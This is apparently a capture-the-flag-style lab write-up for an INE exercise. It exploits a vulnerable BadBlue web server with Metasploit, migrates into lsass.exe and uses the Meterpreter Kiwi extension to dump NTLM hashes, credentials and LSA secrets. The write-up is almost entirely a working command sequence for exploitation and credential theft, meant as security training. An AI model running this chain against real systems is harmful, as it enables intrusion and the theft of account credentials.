Windows: Meterpreter: Kiwi Extension

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine. The target machine running a vulnerable application will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module. Then, use the meterpreter Kiwi plugin to extract sensitive data from the target's machine.

Objective: Exploit the application and find all the flags:

  • Find Administrator and Student users NTLM hash.

  • Dump LSA secrets to find Syskey

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

Writeup

nmap -sSVC demo.ine.local
searchsploit BadBlue
msfconsole
exploit/windows/http/badblue_passthru
set rhosts demo.ine.local
run
migrate -N lsass.exe
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

Last updated